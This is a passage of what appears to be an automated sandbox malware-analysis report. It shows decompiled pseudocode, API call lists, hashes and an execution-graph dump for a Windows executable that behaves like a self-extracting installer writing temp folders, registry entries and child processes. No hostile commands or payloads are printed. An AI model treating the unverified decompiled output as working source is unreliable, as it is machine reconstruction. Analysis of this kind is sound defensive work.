                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                              • Opcode ID: 7d19759f6e689e5a599899d3907e87064f1558611e8700ae23f07c8920fd46d8
                                                                                                                                                                                                                                              • Instruction ID: 532872cb898757eee60ca4407f6c03ce93970f296d35a988520e0be9309a0305
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d19759f6e689e5a599899d3907e87064f1558611e8700ae23f07c8920fd46d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84014F76A402557BDB304BA69C48FEF7A7CEB87B10F140129F929E2280D7618A85C6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                              			E001A65E8(char* __ecx) {
                                                                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                                                              				char* _t12;
                                                                                                                                                                                                                                              				char* _t14;
                                                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                                                                              				_t15 = __ecx;
                                                                                                                                                                                                                                              				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                              				_t10 = 0;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t3 =  *_t12;
                                                                                                                                                                                                                                              					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                              				} while (_t3 != 0);
                                                                                                                                                                                                                                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                              					if(_t16 <= _t15) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                                                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t16 = _t10;
                                                                                                                                                                                                                                              						_t10 = 1;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(_t16);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}










                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,001A2B33), ref: 001A6602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 001A6612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 001A6629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 001A6635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 54fcd240efb3bdebace0931d4921d115649aab6082283dd33116bc4eb1b844c9
                                                                                                                                                                                                                                              • Instruction ID: 4b152245a1e6c0d1d1b6177e7fca2de8abcbfc8ad684a71a6c3c0e8beffc2763
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54fcd240efb3bdebace0931d4921d115649aab6082283dd33116bc4eb1b844c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F0287A5041507EE7321B288C888BBBF9CCF87364B2E01AFE59983401D7250D46C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A69B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0x1a81f8 = E001A6C70();
                                                                                                                                                                                                                                              				__set_app_type(E001A6FBE(2));
                                                                                                                                                                                                                                              				 *0x1a88a4 =  *0x1a88a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0x1a88a8 =  *0x1a88a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0x1a8528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0x1a851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E001A7000();
                                                                                                                                                                                                                                              				if( *0x1a8000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E001A7000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A71EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 001A6FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 001A69C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 001A69D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 001A69E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 001A6A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: 6a1cd0faaf8b1dcb7a3e6d84f9637f59ce2b07a136c92afe292322b6c02c1d48
                                                                                                                                                                                                                                              • Instruction ID: 9f1b121f23a674c310988003aca5e44a771eb182473b500f109db87e01d3a581
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1cd0faaf8b1dcb7a3e6d84f9637f59ce2b07a136c92afe292322b6c02c1d48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F0F8785083018FC759AB30EE0A6047BA1FB17331B51060AE46286AE1CF3A85E1CA11
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:26.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:969
                                                                                                                                                                                                                                              Total number of Limit Nodes:42
2576 a851af 2574->2576 2577 a844b9 20 API calls 2575->2577 2578 a8468f 7 API calls 2576->2578 2579 a8518d 2577->2579 2580 a851c0 2578->2580 2579->2282 2739 a86298 2580->2739 2584 a851ce 2586 a844b9 20 API calls 2584->2586 2585 a851e1 2585->2282 2586->2579 2588 a8468f 7 API calls 2587->2588 2589 a855c7 LocalAlloc 2588->2589 2590 a855db 2589->2590 2591 a855fd 2589->2591 2592 a844b9 20 API calls 2590->2592 2593 a8468f 7 API calls 2591->2593 2594 a855ec 2592->2594 2595 a8560a 2593->2595 2596 a86285 GetLastError 2594->2596 2597 a8560e 2595->2597 2598 a85632 lstrcmpA 2595->2598 2622 a855f1 2596->2622 2599 a844b9 20 API calls 2597->2599 2600 a8564b LocalFree 2598->2600 2601 a85645 2598->2601 2602 a8561f LocalFree 2599->2602 2603 a8565b 2600->2603 2604 a85696 2600->2604 2601->2600 2625 a855f6 2602->2625 2611 a85467 49 API calls 2603->2611 2605 a8589f 2604->2605 2606 a856ae GetTempPathA 2604->2606 2607 a86517 24 API calls 2605->2607 2609 a856eb 2606->2609 2610 a856c3 2606->2610 2607->2625 2608 a86ce0 4 API calls 2612 a82f7e 2608->2612 2618 a8586c GetWindowsDirectoryA 2609->2618 2619 a85717 GetDriveTypeA 2609->2619 2609->2625 2751 a85467 2610->2751 2614 a85678 2611->2614 2612->2290 2612->2314 2616 a85680 2614->2616 2614->2625 2617 a844b9 20 API calls 2616->2617 2617->2622 2785 a8597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2785 2623 a85730 GetFileAttributesA 2619->2623 2635 a8572b 2619->2635 2622->2625 2623->2635 2625->2608 2626 a85467 49 API calls 2626->2609 2627 a82630 21 API calls 2627->2635 2629 a857c1 GetWindowsDirectoryA 2629->2635 2630 a8597d 34 API calls 2630->2635 2631 a8658a CharPrevA 2632 a857e8 GetFileAttributesA 2631->2632 2633 a857fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 a85827 SetFileAttributesA 2634->2635 2635->2618 2635->2619 2635->2623 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 a85467 49 API calls 2635->2636 2781 a86952 2635->2781 2636->2635 2638 a86268 2637->2638 2639 a86249 2637->2639 2641 a8597d 34 API 
calls 2638->2641 2640 a844b9 20 API calls 2639->2640 2642 a8625a 2640->2642 2643 a86277 2641->2643 2644 a86285 GetLastError 2642->2644 2645 a86ce0 4 API calls 2643->2645 2646 a8625f 2644->2646 2647 a83013 2645->2647 2646->2643 2647->2298 2647->2314 2649 a83b2d 2648->2649 2649->2649 2650 a83b72 2649->2650 2651 a83b53 2649->2651 2852 a84fe0 2650->2852 2653 a86517 24 API calls 2651->2653 2654 a83b70 2653->2654 2655 a83b7b 2654->2655 2656 a86298 10 API calls 2654->2656 2655->2304 2656->2655 2658 a82622 2657->2658 2659 a82583 2657->2659 2906 a824e0 GetWindowsDirectoryA 2658->2906 2661 a825e8 RegOpenKeyExA 2659->2661 2662 a8258b 2659->2662 2663 a82609 RegQueryInfoKeyA 2661->2663 2664 a825e3 2661->2664 2662->2664 2666 a8259b RegOpenKeyExA 2662->2666 2665 a825d1 RegCloseKey 2663->2665 2664->2306 2665->2664 2666->2664 2667 a825bc RegQueryValueExA 2666->2667 2667->2665 2669 a83bdb 2668->2669 2677 a83bec 2668->2677 2670 a8468f 7 API calls 2669->2670 2670->2677 2671 a83c03 memset 2671->2677 2672 a83d13 2673 a844b9 20 API calls 2672->2673 2701 a83d26 2673->2701 2674 a83f4d 2678 a86ce0 4 API calls 2674->2678 2675 a8468f 7 API calls 2675->2677 2677->2671 2677->2672 2677->2674 2677->2675 2680 a83d7b CompareStringA 2677->2680 2682 a83fab 2677->2682 2685 a83f1e LocalFree 2677->2685 2686 a83f46 LocalFree 2677->2686 2689 a83fd7 2677->2689 2691 a83cc7 CompareStringA 2677->2691 2702 a83e10 2677->2702 2914 a81ae8 2677->2914 2954 a8202a memset memset RegCreateKeyExA 2677->2954 2980 a83fef 2677->2980 2679 a83f60 2678->2679 2679->2311 2680->2677 2680->2689 2684 a844b9 20 API calls 2682->2684 2688 a83fbe LocalFree 2684->2688 2685->2677 2685->2689 2686->2674 2688->2674 2689->2674 3004 a82267 2689->3004 2691->2677 2692 a83e1f GetProcAddress 2695 a83f64 2692->2695 2692->2702 2693 a83f92 2694 a844b9 20 API calls 2693->2694 2696 a83fa9 2694->2696 2697 a844b9 20 API calls 2695->2697 2698 a83f7c LocalFree 2696->2698 2699 a83f75 FreeLibrary 2697->2699 2700 a86285 GetLastError 2698->2700 2699->2698 
2700->2701 2701->2674 2702->2692 2702->2693 2703 a83eff FreeLibrary 2702->2703 2704 a83f40 FreeLibrary 2702->2704 2994 a86495 2702->2994 2703->2685 2704->2686 2706 a8468f 7 API calls 2705->2706 2707 a83a55 LocalAlloc 2706->2707 2708 a83a6c 2707->2708 2709 a83a8e 2707->2709 2710 a844b9 20 API calls 2708->2710 2711 a8468f 7 API calls 2709->2711 2712 a83a7d 2710->2712 2713 a83a98 2711->2713 2714 a86285 GetLastError 2712->2714 2715 a83a9c 2713->2715 2716 a83ac5 lstrcmpA 2713->2716 2720 a82f64 2714->2720 2717 a844b9 20 API calls 2715->2717 2718 a83ada 2716->2718 2719 a83b0d LocalFree 2716->2719 2721 a83aad LocalFree 2717->2721 2722 a86517 24 API calls 2718->2722 2719->2720 2720->2278 2720->2314 2721->2720 2723 a83aec LocalFree 2722->2723 2723->2720 2725 a8303c 2724->2725 2725->2314 2727 a8468f 7 API calls 2726->2727 2728 a8417d LocalAlloc 2727->2728 2729 a841a8 2728->2729 2730 a84195 2728->2730 2731 a8468f 7 API calls 2729->2731 2732 a844b9 20 API calls 2730->2732 2734 a841b5 2731->2734 2733 a841a6 2732->2733 2733->2314 2735 a841b9 2734->2735 2736 a841c5 lstrcmpA 2734->2736 2738 a844b9 20 API calls 2735->2738 2736->2735 2737 a841e6 LocalFree 2736->2737 2737->2733 2738->2737 2740 a8171e _vsnprintf 2739->2740 2750 a862c9 FindResourceA 2740->2750 2742 a862cb LoadResource LockResource 2743 a86353 2742->2743 2746 a862e0 2742->2746 2744 a86ce0 4 API calls 2743->2744 2745 a851ca 2744->2745 2745->2584 2745->2585 2747 a8631b FreeResource 2746->2747 2748 a86355 FreeResource 2746->2748 2749 a8171e _vsnprintf 2747->2749 2748->2743 2749->2750 2750->2742 2750->2743 2752 a8548a 2751->2752 2753 a8551a 2751->2753 2812 a853a1 2752->2812 2823 a858c8 2753->2823 2756 a85495 2757 a85581 2756->2757 2762 a8550c 2756->2762 2763 a854c2 GetSystemInfo 2756->2763 2759 a86ce0 4 API calls 2757->2759 2764 a8559a 2759->2764 2760 a8553b CreateDirectoryA 2765 a85577 2760->2765 2766 a85547 2760->2766 2761 a8554d 2761->2757 2769 a8597d 34 API calls 2761->2769 2767 a8658a CharPrevA 2762->2767 2774 a854da 
2763->2774 2764->2625 2775 a82630 GetWindowsDirectoryA 2764->2775 2768 a86285 GetLastError 2765->2768 2766->2761 2767->2753 2770 a8557c 2768->2770 2771 a8555c 2769->2771 2770->2757 2771->2757 2773 a85568 RemoveDirectoryA 2771->2773 2772 a8658a CharPrevA 2772->2762 2773->2757 2774->2762 2774->2772 2776 a8265e 2775->2776 2777 a8266f 2775->2777 2778 a844b9 20 API calls 2776->2778 2779 a86ce0 4 API calls 2777->2779 2778->2777 2780 a82687 2779->2780 2780->2609 2780->2626 2782 a8696e GetDiskFreeSpaceA 2781->2782 2783 a869a1 2781->2783 2782->2783 2784 a86989 MulDiv 2782->2784 2783->2635 2784->2783 2786 a859bb 2785->2786 2787 a859dd GetDiskFreeSpaceA 2785->2787 2788 a844b9 20 API calls 2786->2788 2789 a85ba1 memset 2787->2789 2790 a85a21 MulDiv 2787->2790 2791 a859cc 2788->2791 2792 a86285 GetLastError 2789->2792 2790->2789 2793 a85a50 GetVolumeInformationA 2790->2793 2794 a86285 GetLastError 2791->2794 2795 a85bbc GetLastError FormatMessageA 2792->2795 2796 a85a6e memset 2793->2796 2797 a85ab5 SetCurrentDirectoryA 2793->2797 2809 a859d1 2794->2809 2798 a85be3 2795->2798 2799 a86285 GetLastError 2796->2799 2806 a85acc 2797->2806 2801 a844b9 20 API calls 2798->2801 2802 a85a89 GetLastError FormatMessageA 2799->2802 2800 a85b94 2804 a86ce0 4 API calls 2800->2804 2803 a85bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2800 2805 a85c11 2804->2805 2805->2609 2807 a85b0a 2806->2807 2810 a85b20 2806->2810 2808 a844b9 20 API calls 2807->2808 2808->2809 2809->2800 2810->2800 2835 a8268b 2810->2835 2814 a853bf 2812->2814 2813 a8171e _vsnprintf 2813->2814 2814->2813 2815 a8658a CharPrevA 2814->2815 2819 a85415 GetTempFileNameA 2814->2819 2816 a853fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a8544f CreateDirectoryA 2816->2817 2818 a8543a 2817->2818 2817->2819 2821 a86ce0 4 API calls 2818->2821 2819->2818 2820 a85429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 a85449 2821->2822 2822->2756 2824 a858d8 2823->2824 2824->2824 2825 a858df LocalAlloc 
2824->2825 2826 a85919 2825->2826 2827 a858f3 2825->2827 2831 a8658a CharPrevA 2826->2831 2828 a844b9 20 API calls 2827->2828 2829 a85906 2828->2829 2830 a86285 GetLastError 2829->2830 2832 a85534 2829->2832 2830->2832 2833 a85931 CreateFileA LocalFree 2831->2833 2832->2760 2832->2761 2833->2829 2834 a8595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 a826b9 2835->2836 2837 a826e5 2835->2837 2839 a8171e _vsnprintf 2836->2839 2838 a826ea 2837->2838 2843 a8271f 2837->2843 2841 a8171e _vsnprintf 2838->2841 2840 a826cc 2839->2840 2844 a844b9 20 API calls 2840->2844 2846 a826fd 2841->2846 2842 a826e3 2845 a86ce0 4 API calls 2842->2845 2843->2842 2847 a8171e _vsnprintf 2843->2847 2844->2842 2848 a8276d 2845->2848 2849 a844b9 20 API calls 2846->2849 2850 a82735 2847->2850 2848->2800 2849->2842 2851 a844b9 20 API calls 2850->2851 2851->2842 2853 a8468f 7 API calls 2852->2853 2854 a84ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a85020 2854->2855 2870 a8515f 2854->2870 2856 a85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 a85057 2855->2857 2856->2857 2874 a84efd 2857->2874 2860 a85060 2861 a844b9 20 API calls 2860->2861 2862 a85075 2861->2862 2868 a85106 2862->2868 2863 a850e8 2866 a844b9 20 API calls 2863->2866 2864 a8511d 2867 a8513a 2864->2867 2869 a85129 2864->2869 2865 a85110 FreeResource 2865->2864 2866->2862 2867->2870 2872 a8514c SendMessageA 2867->2872 2868->2864 2868->2865 2871 a844b9 20 API calls 2869->2871 2870->2654 2871->2867 2872->2870 2873 a8507c 2873->2863 2873->2868 2876 a84f4a 2874->2876 2875 a84fa1 2878 a86ce0 4 API calls 2875->2878 2876->2875 2882 a84980 2876->2882 2879 a84fc6 2878->2879 2879->2860 2879->2873 2883 a84990 2882->2883 2884 a849c2 lstrcmpA 2883->2884 2885 a849a5 2883->2885 2887 a84a0e 2884->2887 2888 a849ba 2884->2888 2886 a844b9 20 API calls 2885->2886 2886->2888 2887->2888 2893 a8487a 2887->2893 2888->2875 2890 a84b60 2888->2890 2891 a84b92 FindCloseChangeNotification 2890->2891 2892 a84b76 
2890->2892 2891->2892 2892->2875 2894 a848a2 CreateFileA 2893->2894 2896 a84908 2894->2896 2897 a848e9 2894->2897 2896->2888 2897->2896 2898 a848ee 2897->2898 2901 a8490c 2898->2901 2902 a848f5 CreateFileA 2901->2902 2904 a84917 2901->2904 2902->2896 2903 a84962 CharNextA 2903->2904 2904->2902 2904->2903 2905 a84953 CreateDirectoryA 2904->2905 2905->2903 2907 a8255b 2906->2907 2908 a82510 2906->2908 2909 a86ce0 4 API calls 2907->2909 2910 a8658a CharPrevA 2908->2910 2911 a82569 2909->2911 2912 a82522 WritePrivateProfileStringA _lopen 2910->2912 2911->2664 2912->2907 2913 a82548 _llseek _lclose 2912->2913 2913->2907 2915 a81b25 2914->2915 3018 a81a84 2915->3018 2917 a81b57 2918 a8658a CharPrevA 2917->2918 2920 a81b8c 2917->2920 2918->2920 2919 a866c8 2 API calls 2921 a81bd1 2919->2921 2920->2919 2922 a81bd9 CompareStringA 2921->2922 2923 a81d73 2921->2923 2922->2923 2924 a81bf7 GetFileAttributesA 2922->2924 2925 a866c8 2 API calls 2923->2925 2926 a81c0d 2924->2926 2927 a81d53 2924->2927 2928 a81d7d 2925->2928 2926->2927 2933 a81a84 2 API calls 2926->2933 2931 a844b9 20 API calls 2927->2931 2929 a81df8 LocalAlloc 2928->2929 2930 a81d81 CompareStringA 2928->2930 2929->2927 2932 a81e0b GetFileAttributesA 2929->2932 2930->2929 2939 a81d9b 2930->2939 2951 a81cc2 2931->2951 2934 a81e45 2932->2934 2942 a81e1d 2932->2942 2935 a81c31 2933->2935 3024 a82aac 2934->3024 2937 a81c50 LocalAlloc 2935->2937 2943 a81a84 2 API calls 2935->2943 2936 a81e89 2938 a86ce0 4 API calls 2936->2938 2937->2927 2940 a81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2940 2941 a81ea1 2938->2941 2939->2939 2944 a81dbe LocalAlloc 2939->2944 2947 a81cf8 2940->2947 2940->2951 2941->2677 2942->2934 2943->2937 2944->2927 2948 a81de1 2944->2948 2949 a81d09 GetShortPathNameA 2947->2949 2952 a81d23 2947->2952 2950 a8171e _vsnprintf 2948->2950 2949->2952 2950->2951 2951->2936 2953 a8171e _vsnprintf 2952->2953 2953->2951 2955 a8209a 2954->2955 2963 a82256 2954->2963 2957 a8171e _vsnprintf 
2955->2957 2960 a820dc 2955->2960 2956 a86ce0 4 API calls 2958 a82263 2956->2958 2959 a820af RegQueryValueExA 2957->2959 2958->2677 2959->2955 2959->2960 2961 a820fb GetSystemDirectoryA 2960->2961 2962 a820e4 RegCloseKey 2960->2962 2964 a8658a CharPrevA 2961->2964 2962->2963 2963->2956 2965 a8211b LoadLibraryA 2964->2965 2966 a82179 GetModuleFileNameA 2965->2966 2967 a8212e GetProcAddress FreeLibrary 2965->2967 2969 a821de RegCloseKey 2966->2969 2972 a82177 2966->2972 2967->2966 2968 a8214e GetSystemDirectoryA 2967->2968 2970 a82165 2968->2970 2968->2972 2969->2963 2971 a8658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 a821b7 LocalAlloc 2972->2973 2974 a821ec 2973->2974 2975 a821cd 2973->2975 2977 a8171e _vsnprintf 2974->2977 2976 a844b9 20 API calls 2975->2976 2976->2969 2978 a82218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2963 2981 a84016 CreateProcessA 2980->2981 2992 a84106 2980->2992 2982 a84041 WaitForSingleObject GetExitCodeProcess 2981->2982 2983 a840c4 2981->2983 2986 a84070 2982->2986 2985 a86285 GetLastError 2983->2985 2984 a86ce0 4 API calls 2987 a84117 2984->2987 2988 a840c9 GetLastError FormatMessageA 2985->2988 3051 a8411b 2986->3051 2987->2677 2990 a844b9 20 API calls 2988->2990 2990->2992 2991 a84096 CloseHandle CloseHandle 2991->2992 2993 a840ba 2991->2993 2992->2984 2993->2992 2995 a864c2 2994->2995 2996 a8658a CharPrevA 2995->2996 2997 a864d8 GetFileAttributesA 2996->2997 2998 a864ea 2997->2998 2999 a86501 LoadLibraryA 2997->2999 2998->2999 3000 a864ee LoadLibraryExA 2998->3000 3001 a86508 2999->3001 3000->3001 3002 a86ce0 4 API calls 3001->3002 3003 a86513 3002->3003 3003->2702 3005 a82289 RegOpenKeyExA 3004->3005 3006 a82381 3004->3006 3005->3006 3008 a822b1 RegQueryValueExA 3005->3008 3007 a86ce0 4 API calls 3006->3007 3009 a8238c 3007->3009 3010 a82374 RegCloseKey 3008->3010 3011 a822e6 memset GetSystemDirectoryA 3008->3011 3009->2674 3010->3006 3012 a8230f 3011->3012 3013 a82321 3011->3013 3015 a8658a CharPrevA 3012->3015 
3014 a8171e _vsnprintf 3013->3014 3016 a8233f RegSetValueExA 3014->3016 3015->3013 3016->3010 3019 a81a9a 3018->3019 3021 a81aba 3019->3021 3023 a81aaf 3019->3023 3037 a8667f 3019->3037 3021->2917 3022 a8667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 a82ad4 GetModuleFileNameA 3024->3025 3028 a82be6 3024->3028 3036 a82b02 3025->3036 3026 a86ce0 4 API calls 3029 a82bf5 3026->3029 3027 a82af1 IsDBCSLeadByte 3027->3036 3028->3026 3029->2936 3030 a82bca CharNextA 3033 a82bd3 CharNextA 3030->3033 3031 a82b11 CharNextA CharUpperA 3032 a82b8d CharUpperA 3031->3032 3031->3036 3032->3036 3033->3036 3035 a82b43 CharPrevA 3035->3036 3036->3027 3036->3028 3036->3030 3036->3031 3036->3033 3036->3035 3042 a865e8 3036->3042 3040 a86689 3037->3040 3038 a866a5 3038->3019 3039 a86648 IsDBCSLeadByte 3039->3040 3040->3038 3040->3039 3041 a86697 CharNextA 3040->3041 3041->3040 3043 a865f4 3042->3043 3043->3043 3044 a865fb CharPrevA 3043->3044 3045 a86611 CharPrevA 3044->3045 3046 a8660b 3045->3046 3047 a8661e 3045->3047 3046->3045 3046->3047 3048 a8663d 3047->3048 3049 a86634 CharNextA 3047->3049 3050 a86627 CharPrevA 3047->3050 3048->3036 3049->3048 3050->3048 3050->3049 3052 a84132 3051->3052 3054 a8412a 3051->3054 3055 a81ea7 3052->3055 3054->2991 3056 a81ed3 3055->3056 3057 a81eba 3055->3057 3056->3054 3058 a8256d 15 API calls 3057->3058 3058->3056 3060 a81ff0 RegOpenKeyExA 3059->3060 3061 a82026 3059->3061 3060->3061 3062 a8200f RegDeleteValueA RegCloseKey 3060->3062 3061->2321 3062->3061 3129 a819e0 3130 a81a03 3129->3130 3131 a81a24 GetDesktopWindow 3129->3131 3132 a81a20 3130->3132 3134 a81a16 EndDialog 3130->3134 3138 a843d0 6 API calls 3131->3138 3136 a86ce0 4 API calls 3132->3136 3134->3132 3137 a81a7e 3136->3137 3139 a84463 SetWindowPos 3138->3139 3141 a86ce0 4 API calls 3139->3141 3142 a81a33 LoadStringA SetDlgItemTextA MessageBeep 3141->3142 3142->3132 3143 a86a20 __getmainargs 3144 a869b0 3145 a869b5 3144->3145 3153 a86fbe GetModuleHandleW 3145->3153 3147 a869c1 
